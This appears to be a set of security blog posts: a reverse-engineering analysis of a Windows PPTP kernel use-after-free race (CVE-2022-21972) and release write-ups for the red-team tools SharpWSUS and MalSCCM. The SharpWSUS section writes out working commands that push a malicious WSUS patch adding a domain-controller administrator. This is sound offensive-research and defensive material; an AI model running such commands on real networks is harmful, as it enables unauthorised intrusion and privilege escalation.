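    PVOID ContextPtr;                    /* 0x08: PptpCtlCtx                 */
    PVOID ContextRecvCallback;           /* 0x10: CtlReceiveCallback         */
    PVOID ContextDisconnectCallback;     /* 0x18: CtlDisconnectCallback      */
    PVOID ContextConnectQueryCallback;   /* 0x20: CtlConnectQueryCallback    */
} SOCKET_CTX_PARTIAL;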

raspptp.sys Object Life Cycles

The final bit of background information we need to understand before we delve into the vulnerability is the way that raspptp keeps these context structures alive for a given socket. In the case of the PptpCtlCtx structure, both the client socket and the PptpCtlCtx structure have a reference count.

This reference count is intended to be incremented every time a reference to either object is created. These are initially set to 1 and when decremented to 0 the objects are freed by calling a free callback stored within each structure. This obviously only works if the code remembers to increment and decrement the reference counts properly and correctly lock access across multiple threads when handling the respective structures.

Within raspptp.sys, the code that performs the reference increment and decrement functionality usually looks like this:

// Increment code
_InterlockedIncrement(&Ctx->ReferenceCount);

// Decrement Code
if ( _InterlockedExchangeAdd(&Ctx->ReferenceCount, 0xFFFFFFFF) == 1 )
    ((void (__fastcall *)(CtxType *))Ctx->fpFreeHandler)(Ctx);

As you may have guessed at this point, the vulnerability we’re looking at is indeed due to incorrect handling of these reference counts and their respective locks, so now that we have covered the background stuff let’s jump into the juicy details!

The Vulnerability

The first part of our use after free vulnerability is in the code that handles receiving PPTP control data for a client connection. When new data is received by raspptp.sys, the WSK layer will dispatch a call to the appropriate event callback. raspptp.sys registers a generic callback for all sockets called ReceiveData. This function parses the incoming data structures from WSK and forwards the incoming data to the client socket context’s own receive data callback. For a PPTP control connection, this callback is the CtlReceiveCallback function.

The section of the ReceiveData function that calls this callback has the following pseudo code. This snippet includes all of the locking and reference increments that are used to protect the code against multi-threaded access issues:

_InterlockedIncrement(&ClientCtx->ConnectionContextRefernceCount);
((void (__fastcall *)(PptpCtlCtx *, PptpCtlInputBufferCtx *, _NET_BUFFER_LIST *))ClientCtx->ContextRecvCallback)(
ClientCtx->ContextPtr,
lpCtlBufferCtx,
NdisNetBuffer);

The CtlReceiveCallback function has the following pseudo code:

__int64 __fastcall CtlReceiveCallback(PptpCtlCtx *PptpCtlCtx, PptpCtlInputBufferCtx *PptpBufferCtx, _NET_BUFFER_LIST *InputBufferList)
{
    PptpCtlCtx *lpPptpCtlCx;
    PNET_BUFFER lpInputFirstNetBuffer;
    _NET_BUFFER_LIST *lpInputBufferList;
    ULONG NetBufferLength;
    PVOID NetDataBuffer;

    lpPptpCtlCx = PptpCtlCtx;
    lpInputFirstNetBuffer = InputBufferList->FirstNetBuffer;
    lpInputBufferList = InputBufferList;
    NetBufferLength = lpInputFirstNetBuffer->DataLength;
    NetDataBuffer = NdisGetDataBuffer(lpInputFirstNetBuffer, lpInputFirstNetBuffer->DataLength, 0i64, 1u, 0);
    if ( NetDataBuffer )
        CtlpEngine(lpPptpCtlCx, (uchar *)NetDataBuffer, NetBufferLength);
        ReceiveDataComplete(lpPptpCtlCx->CtlWskClientSocketCtx, lpInputBufferList);
        return 0i64;
}

The CtlpEngine function is the state machine responsible for parsing the incoming PPTP control data. Now there is one very important piece of code that is missing from these two sections and that is any form of reference count increment or locking for the PptpCtlCtx object!

Neither of the callback handlers actually increments the reference count for the PptpCtlCtx or attempts to lock access to signify that it is in use; this is potentially a vulnerability, because if at any point the reference count were to be decremented then the object would be freed! However, if this is so bad, why isn’t every PPTP server just crashing all the time? The answer to this question is that the CtlpEngine function actually uses the reference count correctly.

This is where things get confusing. Assuming that the raspptp.sys driver was completely single threaded, this implementation would be 100% safe as no part of the receive pipeline for the control connection decrements the object reference count without first performing an increment to account for it. In reality however, raspptp.sys is not a single threaded driver. Looking back at the initialization of the PptpCtlCtx object, there is one part of particular interest.

TimerCharacteristics.FunctionContext = PptpCtlCtx;
TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
if ( NdisAllocateTimerObject(
    lpNDISMiniportHandle_1,
    &TimerCharacteristics,
    &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )

Here we can see the allocation of an NDIS timer object. The actual implementation of these timers isn’t important, but what is important is that these timers dispatch their callbacks on a separate thread to the one on which WSK dispatches the ReceiveData callback. Another interesting point is that both use the PptpCtlCtx structure as their context structure.

So what does this timer callback do and when does it happen? The code that sets the timer is as follows:

NdisSetTimerObject(newClientCtlCtx->CtlWaitTimeoutNdisTimerHandle, (LARGE_INTEGER)-300000000i64, 0, 0i64);// 30 second timeout timer
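// Note: a negative due time is relative and specified in 100-nanosecond units, so 300,000,000 * 100 ns = 30 seconds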

We can see that a 30 second timer is set, and when the 30 seconds are up the CtlpWaitTimeout callback is called. This timer can be cancelled, but only when a client performs a PPTP control handshake with the server, so as long as we never send a valid handshake the callback will be dispatched once the 30 seconds are up. But what does this callback do?

The CtlpWaitTimeout function is used to handle the timer callback and it has the following pseudo code:

LONG __fastcall CtlpWaitTimeout(PVOID Handle, PptpCtlCtx *Context)
{
    PptpCtlCtx *lpCtlTimeoutEvent;

    lpCtlTimeoutEvent = Context;
    CtlpDeathTimeout(Context);
    return KeSetEvent(&lpCtlTimeoutEvent->CtlWaitTimeoutTriggered, 0, 0);
}

As we can see the function mainly serves to call the eerily named CtlpDeathTimeout function, which has the following pseudo code:

void __fastcall CtlpDeathTimeout(PptpCtlCtx *CtlCtx)
{
    PptpCtlCtx *lpCtlCtx;
    __int64 Unkown;
    CHAR *v3;
    char SockAddrString;

    lpCtlCtx = CtlCtx;
    memset(&SockAddrString, 0, 65ui64);
    if...
        CtlSetState(lpCtlCtx, CtlStateUnknown, Unkown, 0);
        CtlCleanup(lpCtlCtx, 0);
}

This is where things get even more interesting. The CtlCleanup function is the function responsible for starting the process of tearing down the PPTP control connection. This is done in two steps. First, the state of the Control connection is set to CtlStateUnknown which means that the CtlpEngine function will be prevented from processing any further control connection data (kind of). The second step is to push a task to run the similarly named CtlpCleanup function onto a background worker thread which belongs to the raspptp.sys driver.

The end of the CtlpCleanup function contains the following code that will be very useful for us being able to trigger a use after free as it will always run on a different thread to the CtlpEngine function.

result = (unsigned int)_InterlockedExchangeAdd(&lpCtlCtxToCleanup->CtlCtxReferenceCount, 0xFFFFFFFF);
if ( (_DWORD)result == 1 )
    result = ((__int64 (__fastcall *)(PptpCtlCtx *))lpCtlCtxToCleanup->fpCtlCtxFreeFn)(lpCtlCtxToCleanup);

It decrements the reference count on the PptpCtlCtx object and, even better, no part of this timeout pipeline increments the reference count in a way that would prevent the free function from being called!

So, theoretically, all we need to do is find some way of getting the CtlpCleanup and CtlpEngine functions to run at the same time on separate threads and we will be able to cause a use after free!

However, before we celebrate too early, we should take a look at the function that actually frees the PptpCtlCtx structure, because it is yet another callback. The fpCtlCtxFreeFn property is a function pointer to the CtlFree function. This function does a decent amount of teardown as well, but the parts we care about are the following lines:

WskCloseSocketContextAndFreeSocket(CtlWskContext);
lpCtlCtxToFree->CtlWskClientSocketCtx = 0i64;
...
ExFreePoolWithTag(lpCtlCtxToFree, 0);

Now there is more added complication in this code that is going to make things a little more difficult. The call to WskCloseSocketContextAndFreeSocket actually closes the client socket before freeing the PptpCtlCtx structure. This means that at the point the PptpCtlCtx structure is freed, we will no longer be able to send new data to the socket and trigger any more calls into CtlpEngine. However, this doesn’t mean that we can’t trigger the vulnerability, since if data is already being processed by CtlpEngine when the socket is closed we simply need to hope the thread stays in the function long enough for the free to occur in CtlFree and boom – we have a UAF.

Now that we have a good old fashioned kernel race condition, let’s take a look at how we can try to trigger it!

The Race Condition

Like any good race condition, this one contains a lot of moving parts and added complication which make triggering it a non trivial task, but it’s still possible! Let’s take a look at what we need to happen.

  1. 30 second timeout is triggered and eventually runs CtlCleanup, pushing a CtlpCleanup task onto a background worker thread queue.
  2. Background worker thread wakes up and starts processing the CtlpCleanup task from its task queue.
  3. CtlpEngine starts or is currently processing data on a WSK dispatch thread when the CtlpCleanup function frees the underlying PptpCtlCtx structure from the worker thread!
  4. Bad things happen…

Triggering the Race Condition

The main parts of this race condition to consider are: what are the limits on the data we can send to the server in order to spend as much time as possible in the CtlpEngine parsing loop, and can we do this without cancelling the timeout?

Thankfully, as previously mentioned, the only way to cancel the timeout is to perform a PPTP control connection handshake, which technically means we can get the CtlpEngine function to process any other part of the control connection as long as we don’t start the handshake. However, the state machine within CtlpEngine needs the handshake to have taken place before it will enable any other part of the control connection!

There is one part of the CtlpEngine state machine that can still be partially and validly hit (without triggering an error) before the handshake has taken place. This is the EchoRequest control message type. We can’t actually enter the proper handling of the message type before the handshake has taken place, but we can use it to iterate through all of the sent data in the parsing loop without triggering a parsing error. This effectively gives us a way of spinning inside the CtlpEngine function without cancelling the timeout, which is exactly what we want. Even better, this remains true once the CtlStateUnknown state is set by the CtlCleanup function.

Unfortunately the maximum amount of data we can process in one WSK receive data event callback is limited to the maximum amount of data that can be received in one TCP packet. In theory this is 65,535 bytes, but because Ethernet frames are limited to 1,500 bytes we can only send ~1,450 bytes (1,500 minus the headers of the lower network layers) of PPTP control messages in a single request. As each EchoRequest control message is 16 bytes, this works out at around 90 EchoRequest messages per callback event trigger. For a modern CPU this is not a lot to churn through before hopping out of the CtlpEngine function.

Another thing to consider is how we know whether the race condition succeeded or failed. Thankfully, the server socket being closed on timeout works in our favour here, as attempting to send any more data after the server closes the socket will cause a socket exception on the client. Once the socket is closed we know that the race is finished, but we don’t necessarily know whether or not we won it.

With these considerations in place, how do we trigger the vulnerability? It actually becomes a simple proof of concept. Effectively we just continually send EchoRequest PPTP control frames in 90 frame bursts to a server until the timeout event occurs and then we hope that we’ve won the race.

We won’t be releasing the PoC code until people have had a chance to patch things up but when the PoC is successful we may see something like this on our target server:

Because the PptpCtlCtx structure is de-initialised, many of its pointers and properties contain invalid values that, if used in different parts of the receive event handling code, will cause crashes in less interesting ways, such as null pointer dereferences. This is actually what happened in the Blue Screen of Death above, but the CtlpEngine function did still process a freed PptpCtlCtx structure.

Can we use this vulnerability for anything more than a simple BSOD?

Exploitation

Due to the state of mitigation in the Windows kernel against memory corruption exploits and the difficult nature of this race condition, achieving useful exploitation of the vulnerability is not going to be easy, especially if seeking to obtain Remote Code Execution (RCE). However, this does not mean it is not possible to do so.

Exploitability – The Freed Memory

In order to assess the exploitability of the vulnerability, we need to look at what our freed memory contains and whereabouts it sits in the Windows kernel heap. In WinDbg we can use the !pool command to get some information on the allocated chunk that will be freed in our UAF issue.

ffff828b17e50d20 size: 2a0 previous size: 0 (Allocated) *PTPT

We can see here that the size of the freed memory block is 0x2a0, or 672 bytes. This is important as it puts us in the allocation size range for the variable-size kernel heap segment. This heap segment is fairly nice for use after free exploitation, as the variable-size heap also maintains a free list of chunks that have been freed, along with their sizes. When a new chunk is allocated this free list is searched, and if a chunk of an exact or greater size is found it will be used for the new allocation. Since this is the kernel, any other component that makes non-paged pool allocations of this or a similar size could end up using this freed slot as well.

So, what do we need in order to start exploiting this issue? Ideally we want to find some allocated object in the kernel that we can control the contents of and that is allocated at 0x2a0 bytes in size. This would allow us to create a fake PptpCtlCtx object, which we can then use to control the CtlpEngine state machine code. Finding an exact size match allocation isn’t the only way we could groom the heap for a potential exploit, but it would certainly be the most reliable method.

If we can take control of a PptpCtlCtx object, what can we do? One of the most powerful aspects of this vulnerability from an exploit development perspective is the set of callback function pointers located inside the PptpCtlCtx structure. Usually a mitigation such as Control Flow Guard (CFG) or Xtended Flow Guard (XFG) would prevent us from corrupting and using these callback pointers with an arbitrary executable kernel address. However, CFG and XFG are not enabled for the raspptp.sys driver (as of writing this blog), meaning we can point execution at any instruction located in the kernel. This gives us plenty of things to abuse for exploitation purposes. A caveat is that we are limited in the number of these gadgets we can use in one trigger of the vulnerability, meaning we would likely need to trigger the vulnerability multiple times with different gadgets to achieve a full exploit, or at least that’s the case on a modern Windows kernel.

Exploitability – Threads

Allocating an object to fill our freed slot and taking control of kernel execution through a fake PptpCtlCtx object sounds great, but one additional restriction is that we only have access to CtlpEngine using the freed object for a short window of CPU time. We can’t use the same thread that is processing CtlpEngine to allocate objects to fill the empty slot; by the time we could, the thread would already have returned from CtlpEngine, at which point the vulnerability is no longer exploitable.

What this means is that we would need the fake object allocations to be happening in a separate thread in the hope that we can get one of our fake objects allocated and populated with our fake object contents while the vulnerable kernel thread is still in CtlpEngine, allowing us to then start doing bad things with the state machine. All of this sounds like a lot to try and get done in relatively small CPU windows, but it is possible that it could be achieved. The issue with any exploit attempting to do this is going to be reliability, since there is a fairly high chance a failed exploit would crash the target machine and retrying the exploit would be a slow and easily detectable process.

Exploitability – Local Privilege Escalation vs Remote Code Execution

The ability to exploit this issue for LPE is much more likely to be successful over the affected Windows kernel versions than exploiting it for RCE. This is largely due to the fact that an RCE exploit will need to be able to first leak information about the kernel using either this vulnerability or another one before any of the potential callback corruption uses would be viable. There are also far fewer parts of the kernel accessible remotely, meaning finding a way of spraying a fake PptpCtlCtx object into the kernel heap remotely is going to be significantly harder to achieve.

Another reason that LPE is a much more viable exploit route is that a localhost (127.0.0.1) socket allows far more data to be processed by each WSK receive event callback than the Ethernet-frame-capped 1,500 bytes we get remotely. This significantly improves most of the variables involved in achieving successful exploitation!

Conclusion

Wormable kernel remote code execution vulnerabilities are the holy grail of severity in modern operating systems. With great power, however, comes great responsibility. While this vulnerability could be catastrophic in its impact, the skill required to pull off a successful and undetected exploit is not to be underestimated. Memory corruption continues to become a harder and harder art form to master; however, there are definitely those out there with the ability and determination to realise the full potential of this vulnerability. For these reasons, CVE-2022-21972 represents a very real threat to internet-connected, Microsoft-based VPN infrastructure. We recommend that this vulnerability is patched with priority in all environments.

Timeline

  • Vulnerability Reported To Microsoft – 29 October 2021
  • Vulnerability Acknowledged – 29 October 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 November 2021
  • Patch Release – 10 May 2022

The post CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1) appeared first on Nettitude Labs.

Introducing SharpWSUS

5 May 2022 at 09:00

Today, we’re releasing a new tool called SharpWSUS.  This is a continuation of existing WSUS attack tooling such as WSUSPendu and Thunder_Woosus. It brings their complete functionality to .NET, in a way that can be reliably and flexibly used through command and control (C2) channels, including through PoshC2.

The Background to SharpWSUS

During a recent red team engagement, a client wanted to see if a backup server could be compromised. The backup server was critical to the organisation and had consequently been the target of several rounds of red teaming and subsequent remediation, making compromise difficult. During this engagement, we found that the backup server had been removed from Active Directory (AD) and was also segmented from the network, making common lateral movement techniques unsuitable. The only common path seen was Remote Desktop Protocol (RDP) from certain hosts on the network to the target server with a local account. However, no local account was identified during the engagement. With this in mind, we looked for other avenues, for example leveraging servers that would need to connect to all other servers in the environment, and which would need to authenticate and issue code in some way. Enter Windows Server Update Services (WSUS).

Download SharpWSUS

github GitHub: https://github.com/nettitude/SharpWSUS

WSUS Introduction

WSUS is a Microsoft solution for administrators to deploy Microsoft product updates and patches across an environment in a scalable manner, using a method where the internal servers do not need to reach out to the internet directly. WSUS is extremely common within Windows corporate environments.

WSUS Architecture

Typically, the architecture of WSUS deployments is quite simple, although they can be configured in more complex ways. The most common deployment consists of one WSUS server within the corporate network. This server will reach out to Microsoft over HTTP and HTTPS to download Microsoft patches. After downloading these, the WSUS server will deploy the patch to clients as they check in to the WSUS server. Communication between the WSUS server and the clients will occur on port 8530 for HTTP and 8531 for HTTPS. An example of this deployment is below:

Diagram Description automatically generated

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.

In a more complex deployment of WSUS, there may be one main WSUS server that communicates over the internet to Microsoft, then internally the main WSUS server pushes the patches out to other internal WSUS servers, which then deploy it to clients. In this scenario the WSUS server connecting to the internet would be known as the Upstream Server, and the WSUS servers that do not have internet access and get their patches from the Upstream Server would be Downstream Servers. An example diagram of this is below:

Diagram Description automatically generated

This image is from https://docs.microsoft.com/de-de/security-updates/windowsupdateservices/18127657.

The most common deployment seen is a singular WSUS server deploying patches to all clients within the estate. This deployment means that one server in the environment can communicate with all servers and clients managed by WSUS, which makes WSUS a very attractive target for bypassing network segmentation.

SharpWSUS

Attacks on WSUS are nothing new and there is already fantastic tooling out there for abusing WSUS for lateral movement such as WSUSPendu (https://github.com/AlsidOfficial/WSUSpendu), which is the PowerShell script that formed the basis for this tool. There is also another .NET tool publicly available called Thunder_Woosus (https://github.com/ThunderGunExpress/Thunder_Woosus) which aimed to take some functionality from WSUSPendu and port it to .NET.

SharpWSUS is a continuation of this tooling and aims to bring the complete functionality of WSUSPendu and Thunder_Woosus to .NET in a tool that can be reliably used through C2 channels and offers flexibility to the operator.

The flow of using SharpWSUS for lateral movement is as follows:

  • Locate the WSUS server and compromise it.
  • Enumerate the contents of the WSUS server to determine which machines to target.
  • Create a WSUS group.
  • Add the target machine to the WSUS group.
  • Create a malicious patch.
  • Approve the malicious patch for deployment.
  • Wait for the client to download the patch.
  • Clean up after the patch is downloaded.

Locating the WSUS server

The WSUS server that a client is using can be found by querying the following registry key:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate

This key will be present on any workstation or server managed through WSUS. Since the most common deployment is of a singular WSUS server, there is a good chance that the one in the key is the same one used for critical servers.
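For reference, outside of the tool the same setting can be read directly from that key, for example with PowerShell. This is a minimal sketch assuming the standard WUServer and WUStatusServer policy values are set, which is the case when update settings are managed via WSUS group policy:

# Read the WSUS server configured by policy
Get-ItemProperty -Path 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate' |
    Select-Object WUServer, WUStatusServer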

This can be enumerated through SharpWSUS using SharpWSUS.exe locate.

Text Description automatically generated

Enumerating the WSUS server

Once the WSUS server is compromised, SharpWSUS can be used to enumerate various details about the WSUS deployment, such as the computers being managed by the current server, the last time each computer checked in for an update, any Downstream Servers, and the WSUS groups.

This is done through the command SharpWSUS.exe inspect.

Text Description automatically generated

This provides the information needed to choose which machine to target in the environment. For example, within this environment the WSUS server managed the Domain Controllers, such as bloredc2.blorebank.local. This is a common configuration, and the WSUS server is often not treated as being as critical as the Domain Controllers or other assets it manages. For this demo we will compromise the Domain Controller by adding a new local administrator.

Lateral Movement

A key consideration with WSUS lateral movement is that there is no way to control from the server when a client checks in. This means that once a patch is deployed, the lateral movement won’t succeed until the client installs the update. Often the client will check in for patches on a regular cycle, for example daily, but the patches won’t be installed until a patching day that might happen once a month. Some clients may be configured to install patches immediately if their priority level is high enough.

The first step of abusing WSUS is to create the malicious patch, which does have some limitations. When creating the patch there are various values that can be configured through the command line in SharpWSUS, allowing the operator to change the Indicators of Compromise (IoCs) of the patch. There are also values for the payload and its arguments. The payload must be a Microsoft-signed binary, and the payload path must point to a location on disk on the WSUS server where that binary resides.

While the need for a signed binary can limit some attack paths, there are still plenty of binaries that could be used such as PsExec.exe to run a command as SYSTEM, RunDLL32.exe to run a malicious DLL on a network share, MsBuild.exe to grab and execute a remote payload and more. The example in this blog will use PsExec.exe for code execution (https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).

A patch leveraging PsExec.exe can be done with the following command:

SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add && net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"

Note that the way the quotes are escaped will change based on how you are executing the command. The escaping above is the command used within PoshC2.

Text Description automatically generated

Note the GUID returned from the command as this GUID is the Update ID of the patch and will be needed for further commands including cleaning up.

This malicious patch uses the PsExec.exe binary stored on the WSUS server which was uploaded through the C2. This patch will add a new user with the username WSUSDemo and grant them administrative rights over whichever machine it is installed on.

When the patch is created it will be visible in the WSUS console. The patch made can be seen below:

Graphical user interface, text, application Description automatically generated

If the patch is clicked, then more information can be seen:

Graphical user interface, text, application, email Description automatically generated

As part of the patch creation process, the binary used in the patch is also copied to the WSUS content location and called “wuagent.exe”. In this case the WSUS content location is “C:\UPDATES\WsusContent”, and the binary will be copied to “C:\UPDATES\wuagent.exe”. This allows it to be collected by the WSUS client. If the binary is executed, the PsExec.exe help menu is seen, showing it’s just a copy of the Windows signed binary.

Text Description automatically generated

After the patch is made, the next steps are to create a group, add the target computer to the group and then deploy the patch to that group. This is because WSUS patches are approved per WSUS group and not per machine. This means that to target a specific machine, it is necessary to ensure that the machine is in a group with no other machines.

This can be done with one command in SharpWSUS through the following command:

SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group", where the updateid GUID is the one provided in the output of the create command.

Text Description automatically generated

This will check if the group “Demo Group” exists and create it if it doesn’t. It will then add the Domain Controller to the group and approve the malicious patch for the group.

You can check the group being created by running the inspect command again.

Graphical user interface, text Description automatically generated

This can also be seen in the WSUS console.

Graphical user interface, text, application Description automatically generated

After this it is a waiting game for the client to download and install the patch. SharpWSUS can be used to enumerate the status of the update:

SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local, where the updateid is the same as before.

Text Description automatically generated

This value is pretty slow to update and can be unreliable. It is the same when using the WSUS console; WSUS just does not seem very efficient at tracking status. Until the target computer next checks in, the value will not be populated, so the command will return the message above.

To speed up the demo the client will be forced to look for updates.

Graphical user interface, text, timeline Description automatically generated with medium confidence

This showed important updates to be installed…

Timeline Description automatically generated

… including the malicious patch.

Graphical user interface, application, Word Description automatically generated

Checking the local Administrators group of the DC to make sure there is no conflicting user:

Graphical user interface, text Description automatically generated

Then the patch is installed:

Text Description automatically generated with medium confidence

The new local administrator was made on the Domain Controller!

Graphical user interface, application Description automatically generated

Once the patch is installed on the target machine, the client will be able to see the following information.

Graphical user interface, text, application, email Description automatically generated

If they click on the title of the update they will be taken to the details for the patch.

Graphical user interface, text, application, email Description automatically generated

Once the client has checked in, the status will be updated. This is still delayed and can take time to change in the database. It seems the value is updated when the computer next checks in after the patch is installed, which can take a few check-ins.

Text Description automatically generated

Once the patch is installed clean-up can be performed within SharpWSUS with the following command:

SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"

Text Description automatically generated

This will decline the patch, delete the patch, remove the target from the group and delete the group.

Looking on the WSUS console it can be seen that the group is removed.

Graphical user interface, text, application Description automatically generated

If the patch is explicitly searched for within WSUS, it is no longer there.

Graphical user interface, text, application, email Description automatically generated

It should be noted that the patch binary “wuagent.exe” will remain on disk, and it is up to the operator to delete it manually.
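For example, using the content location from this demo (the path will differ per environment):

Remove-Item -Path 'C:\UPDATES\wuagent.exe' -Force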

Protecting Against WSUS Abuse

Lateral movement through WSUS is not a new technique; however, it is an option that will likely remain available to attackers for some time. Whilst it is not possible to prevent an attacker with SYSTEM access on the WSUS server from abusing WSUS like this, it is possible to understand the attack path and take precautions.

The best defence against this would be segmenting the WSUS server from the network so that the server itself is more difficult to compromise, along with implementing a tiered WSUS structure with Upstream and Downstream Servers so that clients can be distributed between each relevant WSUS server.

Segmentation of the WSUS servers from the network makes the WSUS server more difficult to compromise and can force an attacker down a specific path that could be detected. Separating clients out to different WSUS servers limits where an attacker can laterally move to after compromising a Downstream Server.

Various artefacts exist that may present an opportunity for detection:

  • A new WSUS group with one host is likely to be created. For more mass ransomware type attacks this may be all hosts in a new group.
    • The default group name within SharpWSUS is “InjectGroup”
  • The malicious patch itself and its metadata could all lead to detection opportunities when looking for patches outside of the normal Microsoft patches (see the sketch after this list). The default patch created by SharpWSUS will have the following metadata:
    • Title: “SharpWSUS Update”
    • Date: “2021-09-26”
    • Rating: “Important”
    • KB: “5006103”
    • Description: “Install this update to resolve issues in Windows.”
    • URL: “https://www.nettitude.com”
  • When the patch is created, a Microsoft signed binary will be copied to the WSUS web root. If the WSUS content location was C:\Updates\WSUSContent for example, then the signed binary would be placed in C:\Updates\WUAgent.exe. This binary will not be removed after the patch is deleted, so this binary on disk could provide detection cases for WSUS being abused and may indicate what the abuse was (such as PsExec.exe, MsiExec.exe etc).
  • When the WSUS patch is approved, the user that approved it is stored and can be seen in the console. This often appears to be “WUS Server”, and that is what SharpWSUS will use. If your environment uses an alternate approval user then this could stand out.
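As a starting point for the patch metadata detection idea above, the WSUS API can be queried from PowerShell on the WSUS server itself. The sketch below is illustrative only: it assumes the UpdateServices module installed alongside the WSUS role is available, and it simply looks for the SharpWSUS default title; real detection logic should baseline against the organisation’s normal patch metadata rather than a single hard-coded value.

# Connect to the local WSUS server and list updates matching the SharpWSUS default metadata
$wsus = Get-WsusServer
$wsus.GetUpdates() |
    Where-Object { $_.Title -eq 'SharpWSUS Update' } |
    Select-Object Title, CreationDate, KnowledgebaseArticles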

Summary

WSUS is a core part of Windows environments and is very often deployed in a way that would allow an attacker to use it to bypass internal networking restrictions. This blog has not detailed any new attack techniques, but the release of SharpWSUS (https://github.com/nettitude/SharpWSUS) aims to help offensive security professionals utilise this attack path through C2 to demonstrate the risks and drive improvement.

Download SharpWSUS

github GitHub: https://github.com/nettitude/SharpWSUS

The post Introducing SharpWSUS appeared first on Nettitude Labs.

Introducing MalSCCM

4 May 2022 at 09:00

During red team operations the goal is often to compromise a system of high value. These systems will ideally be segmented from the wider network and locked down to prevent compromise. However, the organisation still needs to be able to manage these devices in scalable and reliable ways, such as being able to deploy patches or scripts for administration. Enter Microsoft System Center Configuration Manager (SCCM).

Download MalSCCM

Today, we have released MalSCCM, which takes some of the functionality of PowerSCCM and enhances some usage aspects, making it more appropriate for Command and Control usage.

We will be presenting a talk that covers two new tools, including this one, at Black Hat Asia on May 13th @ 10:15 SGT.  You can download MalSCCM from the repository below.

github GitHub: https://github.com/nettitude/MalSCCM

Read on for more information about how MalSCCM can be used to laterally move and act on objectives.

SCCM Introduction

SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. SCCM allows for a great deal of functionality, including pushing PowerShell scripts to its clients, pushing commands to its clients, opening remote terminal sessions on clients, installing software on its clients, altering policies on its clients and more.

This range of functionality makes it an ideal target for attackers that want to laterally move within an environment whilst blending in with normal activity. To compromise SCCM it is necessary to understand the different ways SCCM can be deployed within an environment.

SCCM Architecture

SCCM can be deployed in a number of ways to be ideal for the target environment, however there is some common terminology:

  • Central Administration Site – When there are multiple Primary Sites (environments) this will be the one central location that management is performed from and will be passed down to each relevant Primary Site. Installation of a Central Administration Site can only be done for large environments with more than 100,000 clients.
  • Primary Site – These are the main management points for each environment. Unless a Central Administration Site is within the environment, this will be the point where all management is performed and pushed out.
  • Secondary Site – These sites are children of Primary Sites and are managed by the Primary Site, however they have their own SQL databases, and they aid with establishing connections between endpoint clients and the Primary Site.
  • Distribution Point – These are the servers that actually deliver the contents of the updates to the endpoint clients. Each Distribution Point supports up to 4,000 clients, and by default both Primary Sites and Secondary Sites are also a Distribution Point.

With this range of roles within SCCM, there are a large number of configurations for how any given endpoint may be retrieving updates. A visual representation of a possible hierarchy is below:

SMS/SCCM, Beyond Application Deployment - Matthew Hudson: Hierarchy Simplification and Secondary's

The image above is from http://sms-hints-tricks.blogspot.com/2012/06/hiearchy-simplification-and-secondarys.html.

The simplest configuration is a Primary Site which has no child Secondary Sites and acts as the Distribution Point itself. This allows SCCM to be deployed and used in the environment with only one server performing all of the roles, supporting up to 4,000 clients.

A more robust deployment would be a Primary Site that is segmented from the corporate network which can only talk to Secondary Sites. These Secondary Sites would also be segmented in various parts of the network for various environments. These Secondary Sites would then communicate with Distribution Points on the network which in turn will communicate with the endpoints.

Through either of these deployment styles, if the Primary Site can be compromised, then it offers a great advantage to attackers for widespread command execution. This could be used to proliferate ransomware at scale through an environment, or it could be used to target specific machines and laterally move to them in a variety of ways.

MalSCCM

Tooling for red teams and attackers has long since shifted to .NET; however, there are very few tools publicly available for abusing SCCM, making it an attack path that may not be explored as often.

For PowerShell there is PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which is great, however using it through C2 introduces a lot of Indicators of Compromise (IoC) for running PowerShell, which may not be appropriate depending on the target’s defence.

With the release of this blog post, Nettitude has released MalSCCM (https://github.com/nettitude/MalSCCM) which takes a subset of the functionality of PowerSCCM and enhances some usage aspects, making it more apt for C2 usage.

As this is the first release of MalSCCM, it currently only enables the abuse of application deployments for lateral movement through SCCM, however this seems to be a reliable method for lateral movement. The functionality included within MalSCCM may increase over time as more attack paths are explored.

MalSCCM – Understanding the deployment

The first hurdle of targeting SCCM is understanding how SCCM is deployed in the environment and which servers to target.

Assuming this is a red team scenario, the first machine compromised is likely an employee’s machine. Whilst on the machine it is worth looking out for processes that indicate the machine is managed by SCCM such as CcmExec.

A screenshot of a computer Description automatically generated with medium confidence

These processes are present on any machine that is an SCCM client, whether it’s a server or a workstation. If the machine is managed by SCCM then it needs to know where its Distribution Point is. This is a value held in the registry and can be read through the following command: MalSCCM.exe locate.

Text Description automatically generated

The locate command will tell you what the SiteCode of the SCCM deployment is (used by SCCM to differentiate Primary Sites) as well as the Distribution Point for the machine. From the endpoint client it is not possible to tell at this point whether the Distribution Point is also the Primary Site, however it may be possible to tell through LDAP looking at naming conventions or descriptions of the server.
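For reference, related details can also be pulled directly from the client’s root\ccm WMI namespace using the same SMS_Authority class queried in the PowerShell investigation section at the end of this post. The sketch below returns the site code (Name comes back as SMS:<SiteCode>) and the client’s current management point; the CurrentManagementPoint property is an assumption here, and note that the management point is not necessarily the same server as the Distribution Point returned by locate:

Get-WmiObject -Namespace "root\ccm" -Class SMS_Authority |
    Select-Object Name, CurrentManagementPoint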

Within a red team scenario, it would then be necessary to compromise the environment to a point where you can compromise that Distribution Point. This could for example be compromising a user that is an SCCM administrator or it could be compromising infrastructure administrators, LAPS etc.

If you wanted to assess whether the Distribution Point was also the Primary Site and you didn’t want to get a C2 implant on the server, you could enumerate this through MalSCCM by trying a command such as below:

MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups

